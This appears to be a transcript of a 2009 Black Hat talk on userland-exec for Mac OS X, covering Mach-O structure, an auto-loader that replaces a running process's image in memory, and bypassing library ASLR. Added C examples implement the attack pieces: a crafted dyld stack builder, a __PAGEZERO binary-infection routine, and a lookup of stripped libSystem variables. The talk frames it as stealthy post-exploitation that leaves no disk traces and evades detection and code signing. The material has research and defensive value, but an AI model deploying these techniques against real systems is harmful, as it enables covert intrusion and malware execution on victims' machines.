bh dc09
TRANSCRIPT
Who am I?
• Student at Politecnico di Milano.
• Security Consultant at Secure Network srl.
• Reverse Engineer at Zynamics GmbH.
03/08/2010
2
Goal of the talk
In-memory execution of arbitrary binaries on a Mac OS X machine.
Talk outline
• Mach-O file structure
• XNU binary execution
• Attack technique
• Defeat ASLR on libraries to enhance the attack
Mach-O file
• Header structure: identifies the target architecture and the file type, and tells the loader how to interpret the rest of the file.
• Load commands: describe the segments to map, the location of the symbol and string tables, the libraries to load and the initial register state of the main thread.
• Segments: define regions of virtual memory with their protection flags, and contain sections holding code or data.
Segment and Sections
segment: virtual address 0x1000, virtual memory size 0x1000, file offset 0x0, file size 0x1000
section: virtual address 0x1d54, virtual memory size 0x275, file offset 0xd54
The section lives inside the segment, so its file offset follows from its virtual address: 0x1d54 - 0x1000 (segment virtual address) + 0x0 (segment file offset) = 0xd54.
Important segments
• __PAGEZERO: code that dereferences NULL lands here. It is mapped with no protection flags, so any access faults.
• __TEXT: holds code and read-only data. RX protection.
• __DATA: holds writable data. RW protection.
• __LINKEDIT: holds the information used by the dynamic linker, including the symbol and string tables. Mapped read-only.
Mach-O representation
Binary execution
• Carried out by the kernel and the dynamic linker (dyld).
• When the kernel has finished its part, it transfers control to the dynamic linker's entry point.
• The dynamic linker is not randomized.
Execution steps
Kernel:
• Maps the dynamic linker in the process address space.
• Parses the header structure and loads all segments.
• Creates a new stack.
Dynamic linker:
• Retrieves the base address of the binary.
• Resolves symbols.
• Resolves library dependencies.
• Jumps to the binary entry point.
Stack
• Mach-O file base address (a pointer to the mach_header).
• Command line arguments.
• Environment variables.
• Execution path.
• All entries are padded and aligned.
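What the auto-loader has to reproduce, as an added example that is not part of the talk: a builder for the 32-bit initial stack the kernel hands to dyld, holding the items listed on the slide (pointer to the Mach-O header, argc and argv, envp, execution path) with alignment padding. The word order is the one dyld's i386 entry code pops (mach_header pointer first, then argc and argv); the stack address 0xbffff000, the program arguments and the single environment variable are constructed inputs, and the exact string placement XNU uses is approximated.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STACK_SIZE  0x1000u   /* one page is plenty for a demo stack */
#define MAX_STRINGS 32

/* The crafted stack as the auto-loader would map it: raw bytes plus the
 * virtual address the page will occupy, so stored pointers can be absolute. */
struct crafted_stack {
    uint8_t  mem[STACK_SIZE];
    uint32_t base;   /* virtual address of mem[0] once mapped */
    uint32_t sp;     /* initial %esp to hand to dyld's entry point */
};

static void put32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }
static uint32_t get32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }

/* Lay out what XNU leaves on the stack of a 32-bit process, top down:
 * the strings (execution path, environment, arguments) at the highest
 * addresses, then at the 16-byte aligned stack pointer:
 *   [mach_header*] [argc] [argv...] [NULL] [envp...] [NULL] [exec path] [NULL]
 * Returns 1 on success, 0 if the strings and pointers do not fit. */
int build_stack(struct crafted_stack *st, uint32_t base, uint32_t mach_header_va,
                int argc, const char **argv, int envc, const char **envp,
                const char *exec_path)
{
    uint32_t argv_off[MAX_STRINGS], envp_off[MAX_STRINGS], path_off;
    uint32_t top = STACK_SIZE;
    if (argc < 1 || argc > MAX_STRINGS || envc < 0 || envc > MAX_STRINGS) return 0;
    memset(st->mem, 0, STACK_SIZE);
    st->base = base;

/* Copy one NUL-terminated string just below `top` and record its offset. */
#define PUSH_STR(s, off) do { size_t n_ = strlen(s) + 1;            \
        if (n_ > top) return 0; top -= (uint32_t)n_;                 \
        memcpy(st->mem + top, (s), n_); (off) = top; } while (0)
    PUSH_STR(exec_path, path_off);
    for (int i = envc - 1; i >= 0; i--) PUSH_STR(envp[i], envp_off[i]);
    for (int i = argc - 1; i >= 0; i--) PUSH_STR(argv[i], argv_off[i]);
#undef PUSH_STR

    /* Pointer block: mh, argc, argv + NULL, envp + NULL, exec path + NULL. */
    uint32_t words = 2 + (uint32_t)argc + 1 + (uint32_t)envc + 1 + 2;
    if (words * 4 > top) return 0;
    uint32_t sp = (top - words * 4) & ~15u;       /* ABI wants 16-byte alignment */
    uint8_t *p = st->mem + sp;
    put32(p, mach_header_va);           p += 4;   /* the first thing dyld pops */
    put32(p, (uint32_t)argc);           p += 4;
    for (int i = 0; i < argc; i++) { put32(p, base + argv_off[i]); p += 4; }
    put32(p, 0);                        p += 4;
    for (int i = 0; i < envc; i++) { put32(p, base + envp_off[i]); p += 4; }
    put32(p, 0);                        p += 4;
    put32(p, base + path_off);          p += 4;   /* execution path */
    put32(p, 0);
    st->sp = base + sp;
    return 1;
}

/* Read back a word or a string by virtual address, as the new process would.
 * Out-of-range addresses yield 0 / NULL. */
uint32_t stack_word(const struct crafted_stack *st, uint32_t va)
{
    if (va < st->base || va - st->base > STACK_SIZE - 4) return 0;
    return get32(st->mem + (va - st->base));
}
const char *stack_str(const struct crafted_stack *st, uint32_t va)
{
    if (va < st->base || va - st->base >= STACK_SIZE) return NULL;
    return (const char *)(st->mem + (va - st->base));
}

int main(void)
{
    /* Constructed inputs: a stack page at 0xbffff000 (an example address in the
     * i386 stack region) for "ls -l" with one environment variable. */
    struct crafted_stack st;
    const char *argv[] = { "ls", "-l" };
    const char *envp[] = { "PATH=/usr/bin" };
    if (!build_stack(&st, 0xbffff000u, 0x1000u, 2, argv, 1, envp, "/bin/ls")) return 1;
    printf("sp = 0x%08x, mach_header* = 0x%08x, argc = %u\n",
           st.sp, stack_word(&st, st.sp), stack_word(&st, st.sp + 4));
    for (uint32_t va = st.sp + 8; stack_word(&st, va); va += 4)
        printf("argv: %s\n", stack_str(&st, stack_word(&st, va)));
    return 0;
}
```

The pointers are absolute because the auto-loader knows in advance where it will map the page; if it picked the address at run time it would have to relocate every pointer in the block instead.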
Stack representation
Proposed attack
• A userland-exec attack.
• Encapsulate a shellcode, the auto-loader, and a crafted stack in the injected binary.
• Execute the auto-loader in the address space of the attacked process.
Who, where, why
• Who: an attacker who already has remote code execution on the target.
• Where: the attack is two-staged. A first-stage shellcode receives the binary, then runs the auto-loader contained in it.
• Why: later in this talk.
What kind of binaries?
Any Mach-O file, from ls to Safari
Infected binary
• We need a place in the file to store the auto-loader and the crafted stack.
• __PAGEZERO infection technique.
• Cavity infector technique.
__PAGEZERO infection
• Change the __PAGEZERO protection flags to a custom value.
• Store the crafted stack and the auto-loader code at the end of the binary.
• Point __PAGEZERO (file offset and file size) at the crafted stack.
• Overwrite the first bytes of the file with the auto-loader address.
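The Mach-O structure slides and the __PAGEZERO infection steps in working code. This is an added example written for this transcript, not the tool demonstrated in the talk: it redefines the 32-bit Mach-O structures so it compiles on any host, builds a constructed two-segment image in memory, walks the load commands, applies the slide-7 address arithmetic, and then performs the infection steps on a copy of the file. The marker protection value and the decision to store the auto-loader's file offset (rather than an absolute address) in the first four bytes are assumptions; the placeholder stack and loader bytes are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Subset of <mach-o/loader.h>, redefined so this builds on any host. */
#define LC_SEGMENT      0x1u
#define VM_PROT_READ    0x1u
#define VM_PROT_WRITE   0x2u
#define VM_PROT_EXECUTE 0x4u
#define PAGE_4K         0x1000u
/* Protection written into __PAGEZERO as the infection marker. The slides only
 * say "a custom value"; this particular value is an assumption. */
#define PAGEZERO_MARKER (VM_PROT_READ | VM_PROT_WRITE)

struct mach_header  { uint32_t magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags; };
struct load_command { uint32_t cmd, cmdsize; };
struct segment_command { uint32_t cmd, cmdsize; char segname[16];
    uint32_t vmaddr, vmsize, fileoff, filesize, maxprot, initprot, nsects, flags; };

/* Walk the load commands and return the LC_SEGMENT named `name`; NULL if absent
 * or if a cmdsize would run past sizeofcmds (malformed file). No magic check on
 * purpose: after infection the first bytes no longer hold it. */
struct segment_command *find_segment(uint8_t *image, const char *name)
{
    struct mach_header *mh = (struct mach_header *)image;
    uint8_t *p = image + sizeof *mh, *end = p + mh->sizeofcmds;
    for (uint32_t i = 0; i < mh->ncmds; i++) {
        struct load_command *lc = (struct load_command *)p;
        if ((size_t)(end - p) < sizeof *lc || lc->cmdsize < sizeof *lc || (size_t)(end - p) < lc->cmdsize)
            return NULL;
        if (lc->cmd == LC_SEGMENT && lc->cmdsize >= sizeof(struct segment_command) &&
            strncmp(((struct segment_command *)p)->segname, name, 16) == 0)
            return (struct segment_command *)p;
        p += lc->cmdsize;
    }
    return NULL;
}

/* Slide 7: a file-backed virtual address inside a segment is at file offset
 * (va - vmaddr) + fileoff. Zero-fill tail or outside the segment -> UINT32_MAX. */
uint32_t va_to_fileoff(const struct segment_command *sc, uint32_t va)
{
    if (va < sc->vmaddr || va - sc->vmaddr >= sc->filesize) return UINT32_MAX;
    return va - sc->vmaddr + sc->fileoff;
}

/* __PAGEZERO infection (slide 21) on a copy of the file: append crafted stack and
 * auto-loader (page padded), point __PAGEZERO's file offset/size at them, set the
 * marker protection, overwrite the first bytes with the auto-loader location.
 * Stored here as the loader's file offset (the first stage adds its receive
 * buffer address). Returns the new length, 0 on failure; the caller frees *out. */
size_t infect_pagezero(const uint8_t *file, size_t len,
                       const uint8_t *stack, size_t stack_len,
                       const uint8_t *loader, size_t loader_len, uint8_t **out)
{
    size_t payload = (stack_len + loader_len + PAGE_4K - 1) & ~(size_t)(PAGE_4K - 1);
    if (len < sizeof(struct mach_header) || len + payload > UINT32_MAX) return 0;
    uint8_t *img = calloc(len + payload, 1);
    if (!img) return 0;
    memcpy(img, file, len);
    struct segment_command *pz = find_segment(img, "__PAGEZERO");
    if (!pz) { free(img); return 0; }
    memcpy(img + len, stack, stack_len);
    memcpy(img + len + stack_len, loader, loader_len);
    pz->fileoff  = (uint32_t)len;                 /* crafted stack starts here */
    pz->filesize = (uint32_t)payload;
    pz->initprot = PAGEZERO_MARKER;
    uint32_t loader_off = (uint32_t)(len + stack_len);
    memcpy(img, &loader_off, sizeof loader_off);  /* clobbers the magic */
    *out = img;
    return len + payload;
}

/* Constructed sample: a 4 KiB i386 executable with __PAGEZERO and the __TEXT
 * segment of slide 7 (vmaddr 0x1000, file offset 0, size 0x1000). */
uint8_t *build_sample_image(size_t *len)
{
    uint8_t *img = calloc(PAGE_4K, 1);
    if (!img) return NULL;
    struct mach_header *mh = (struct mach_header *)img;
    struct segment_command *sc = (struct segment_command *)(img + sizeof *mh);
    *mh = (struct mach_header){ 0xfeedface, 7, 3, 2, 2, 2 * sizeof *sc, 0 };
    sc[0] = (struct segment_command){ LC_SEGMENT, sizeof *sc, "__PAGEZERO", 0, PAGE_4K, 0, 0, 0, 0, 0, 0 };
    sc[1] = (struct segment_command){ LC_SEGMENT, sizeof *sc, "__TEXT", PAGE_4K, PAGE_4K, 0, PAGE_4K,
                                      VM_PROT_READ | VM_PROT_EXECUTE, VM_PROT_READ | VM_PROT_EXECUTE, 0, 0 };
    *len = PAGE_4K;
    return img;
}

int main(void)
{
    size_t len, newlen; uint8_t *img = build_sample_image(&len), *out = NULL;
    uint8_t stack[64] = { 0 }, loader[16] = { 0xcc };   /* placeholder payloads */
    struct segment_command *text = img ? find_segment(img, "__TEXT") : NULL;
    if (!text) return 1;
    printf("VA 0x1d54 in __TEXT -> file offset 0x%x\n", va_to_fileoff(text, 0x1d54));
    newlen = infect_pagezero(img, len, stack, sizeof stack, loader, sizeof loader, &out);
    uint32_t first = 0; if (out) memcpy(&first, out, 4);
    printf("infected image: %zu bytes, first word (auto-loader offset) 0x%x\n", newlen, first);
    free(img); free(out);
    return 0;
}
```

Note that the infected file is never handed to execve(): the first-stage shellcode parses it, so destroying the magic costs nothing, while the bounds checks in find_segment matter because the auto-loader runs the same walk on bytes that arrived over the network.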
Binary layout
Auto-loader
• Impersonates the kernel.
• Unmaps the old binary.
• Maps the new one.
Auto-loader description
• Parses the injected binary.
• Reads the virtual addresses of the injected binary's segments.
• Unmaps the attacked binary's segments at those virtual addresses.
• Maps the injected binary's segments in their place.
Auto-loader description (2)
• Maps the crafted stack referenced by __PAGEZERO.
• Cleans the registers.
• Cleans some libSystem variables.
• Jumps to the dynamic linker entry point.
We do like pictures, don't we?
[Figure: the victim's process address space before and after the attack; the TEXT, DATA, LINKEDIT and remaining segments (SEGMENT-N) of the attacked binary are replaced by those of the injected one.]
libSystem variables
• _malloc_def_zone_state
• _NXArgv_pointer
• _malloc_num_zones
• __keymgr_global
Why are those variables important?
• They are used in the initialization of malloc.
• Two of them are used for command line argument parsing.
• Not cleaning them results in a crash.
Hunting the variables
• Mac OS X Leopard has ASLR for libraries.
• Those variables are not exported.
• So the dlopen()/dlsym() combo cannot be used to find them.
Defeat ASLR
• Retrieve the in-memory base address of libSystem.
• Read the symbols from the libSystem binary on disk.
• Adjust the symbol addresses to the in-memory base.
How ASLR works in Leopard
• Only libraries are randomized; the main binary and the dynamic linker are not.
• The randomization is performed whenever the system or the libraries are updated, not at every process start.
• Library segment addresses are saved in dyld_shared_cache_<arch>.map (dyld_shared_cache_i386.map on a 32-bit Intel system).
Retrieve libSystem address
• Parse dyld_shared_cache_i386.map and search for the libSystem entry.
• Or use the functions exported by the dynamic linker and perform the whole task in memory.
Dyld functions
• _dyld_image_count(): the number of images (libraries) loaded in the process.
• _dyld_get_image_header(): the base address (mach_header) of each image.
• _dyld_get_image_name(): the path of a given image.
Find 'em
• Parse the dyld load commands.
• Retrieve the __LINKEDIT address.
• Iterate the dyld symbol table and look the function names up in the string table in __LINKEDIT.
Back to libSystem
• Non-exported symbols are stripped from the symbol table of the in-memory copy.
• Open the libSystem binary on disk and find the variables in its symbol table.
• Adjust their addresses to the base of the in-memory __DATA segment.
Put the pieces together
• Iterate the load commands of the in-memory libSystem header and find the __DATA base address.
– On-disk __DATA base address: 0x2000
– Symbol on disk at 0x2054
– In-memory __DATA base address: 0x4000
– Symbol in memory at 0x4054 (0x2054 - 0x2000 + 0x4000)
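The symbol hunt of the three slides above (walk dyld's load commands to the symbol table, look the names up, rebase them onto the in-memory __DATA segment) as an added example, not the talk's own code: a bounds-checked walk of a 32-bit Mach-O's load commands to LC_SYMTAB, a name lookup over the nlist entries and string table, and the rebase from the on-disk __DATA vmaddr to the in-memory one. Because it has to compile anywhere, the libSystem image is a constructed stand-in (the four slide-27 variables as local symbols, with made-up values) and the "in-memory" copy is the same image with __DATA slid to 0x4000 and its local symbols stripped, standing in for the header _dyld_get_image_header() would return on a real Leopard system.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Subset of <mach-o/loader.h> and <mach-o/nlist.h>, redefined to build anywhere. */
#define LC_SEGMENT 0x1u
#define LC_SYMTAB  0x2u
#define N_SECT     0x0eu   /* n_type of a symbol defined in a section; no N_EXT bit */

struct mach_header    { uint32_t magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags; };
struct load_command   { uint32_t cmd, cmdsize; };
struct segment_command { uint32_t cmd, cmdsize; char segname[16];
    uint32_t vmaddr, vmsize, fileoff, filesize, maxprot, initprot, nsects, flags; };
struct symtab_command { uint32_t cmd, cmdsize, symoff, nsyms, stroff, strsize; };
struct nlist          { uint32_t n_strx; uint8_t n_type, n_sect; int16_t n_desc; uint32_t n_value; };

/* First load command of `type`; for LC_SEGMENT a non-NULL `segname` selects the
 * segment by name. Stops at any cmdsize that would run past sizeofcmds. */
static const void *find_command(const uint8_t *img, uint32_t type, const char *segname)
{
    const struct mach_header *mh = (const struct mach_header *)img;
    const uint8_t *p = img + sizeof *mh, *end = p + mh->sizeofcmds;
    for (uint32_t i = 0; i < mh->ncmds; i++) {
        const struct load_command *lc = (const struct load_command *)p;
        if ((size_t)(end - p) < sizeof *lc || lc->cmdsize < sizeof *lc || (size_t)(end - p) < lc->cmdsize)
            return NULL;
        if (lc->cmd == type && (type != LC_SEGMENT || !segname ||
            (lc->cmdsize >= sizeof(struct segment_command) &&
             !strncmp(((const struct segment_command *)p)->segname, segname, 16))))
            return p;
        p += lc->cmdsize;
    }
    return NULL;
}

/* Slide 35: iterate the LC_SYMTAB nlist entries and match names in the string
 * table. Finds non-exported symbols too, which is why slide 36 runs this on the
 * on-disk libSystem and not on the stripped in-memory copy. `len` bounds every
 * table access so a hostile file cannot walk the loop off the buffer. */
int lookup_symbol(const uint8_t *img, size_t len, const char *name, uint32_t *value)
{
    const struct symtab_command *st = find_command(img, LC_SYMTAB, NULL);
    if (!st || st->cmdsize < sizeof *st) return 0;
    if ((uint64_t)st->symoff + (uint64_t)st->nsyms * sizeof(struct nlist) > len ||
        (uint64_t)st->stroff + st->strsize > len) return 0;
    const struct nlist *syms = (const struct nlist *)(img + st->symoff);
    const char *strtab = (const char *)(img + st->stroff);
    for (uint32_t i = 0; i < st->nsyms; i++) {
        uint32_t x = syms[i].n_strx;
        if (x >= st->strsize || !memchr(strtab + x, 0, st->strsize - x)) continue;
        if (strcmp(strtab + x, name) == 0) { *value = syms[i].n_value; return 1; }
    }
    return 0;
}

/* Slide 37: the on-disk value is relative to the on-disk __DATA vmaddr; rebase it. */
uint32_t rebase_symbol(uint32_t sym_value, uint32_t disk_seg_vmaddr, uint32_t mem_seg_vmaddr)
{ return sym_value - disk_seg_vmaddr + mem_seg_vmaddr; }

/* Whole chain: name -> on-disk value -> address in the running process. `mem` is
 * the in-memory header (what _dyld_get_image_header() hands back on the real system). */
int resolve_in_memory(const uint8_t *disk, size_t disk_len, const uint8_t *mem,
                      const char *name, uint32_t *addr)
{
    const struct segment_command *d = find_command(disk, LC_SEGMENT, "__DATA");
    const struct segment_command *m = find_command(mem, LC_SEGMENT, "__DATA");
    uint32_t v;
    if (!d || !m || !lookup_symbol(disk, disk_len, name, &v)) return 0;
    *addr = rebase_symbol(v, d->vmaddr, m->vmaddr);
    return 1;
}

#define SAMPLE_LEN 0x400u
/* Constructed stand-in for libSystem: __DATA at 0x2000 and the four slide-27
 * variables as local N_SECT symbols (values made up). With as_mapped != 0 it
 * mimics the shared-cache copy: __DATA slid to 0x4000, local symbols stripped. */
uint8_t *build_sample(size_t *len, int as_mapped)
{
    static const char *names[] = { "_malloc_def_zone_state", "_NXArgv_pointer",
                                   "_malloc_num_zones", "__keymgr_global" };
    static const uint32_t values[] = { 0x2040, 0x2048, 0x2054, 0x2058 };
    uint8_t *img = calloc(SAMPLE_LEN, 1);
    if (!img) return NULL;
    struct mach_header *mh = (struct mach_header *)img;
    struct segment_command *seg = (struct segment_command *)(img + sizeof *mh);
    struct symtab_command *st = (struct symtab_command *)(seg + 1);
    uint32_t symoff = 0x100, nsyms = 4, stroff = symoff + nsyms * sizeof(struct nlist), strx = 1;
    struct nlist *syms = (struct nlist *)(img + symoff);
    char *strtab = (char *)(img + stroff);          /* index 0 is the empty string */
    *mh  = (struct mach_header){ 0xfeedface, 7, 3, 6, 2, sizeof *seg + sizeof *st, 0 };
    *seg = (struct segment_command){ LC_SEGMENT, sizeof *seg, "__DATA",
                                     as_mapped ? 0x4000 : 0x2000, 0x1000, 0x2000, 0x1000, 3, 3, 0, 0 };
    for (uint32_t i = 0; i < nsyms; i++) {
        size_t n = strlen(names[i]) + 1;
        memcpy(strtab + strx, names[i], n);
        syms[i] = (struct nlist){ strx, N_SECT, 2, 0, values[i] };
        strx += (uint32_t)n;
    }
    *st = (struct symtab_command){ LC_SYMTAB, sizeof *st, symoff, as_mapped ? 0 : nsyms, stroff, strx };
    *len = SAMPLE_LEN;
    return img;
}

int main(void)
{
    size_t len; uint32_t v = 0, addr = 0;
    uint8_t *disk = build_sample(&len, 0), *mem = build_sample(&len, 1);
    if (!disk || !mem) return 1;
    printf("in-memory symbol table: %s\n",
           lookup_symbol(mem, len, "_malloc_num_zones", &v) ? "found" : "stripped");
    if (lookup_symbol(disk, len, "_malloc_num_zones", &v) &&
        resolve_in_memory(disk, len, mem, "_malloc_num_zones", &addr))
        printf("_malloc_num_zones: on disk 0x%x, in memory 0x%x\n", v, addr);
    free(disk); free(mem);
    return 0;
}
```

On a real system the same lookup_symbol() run over dyld's own in-memory header is how the three _dyld_* functions of slide 34 are located, since dyld is not randomized and keeps its exported symbols; libSystem needs the detour through the on-disk file only because its local symbols are gone from the mapped copy.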
Results
• Run a binary on an arbitrary machine.
• No traces on the hard disk.
• No execve(): the kernel doesn't know about us.
• It works with every binary.
• Payloads can be written in a high-level language.
Demo description
• Run a simple piece of code which acts as the first-stage shellcode and retrieves the binary.
• Execute the attack with nmap and Safari.
• Show the network dump.
• Show the memory layout before and after the attack.
DEMO
Future developments
• Employ encryption to avoid NIDS detection.
• Use the cavity infector technique.
• Port the code to the iPhone to evade code signing protection (catch you at BH Europe).
Thanks, questions?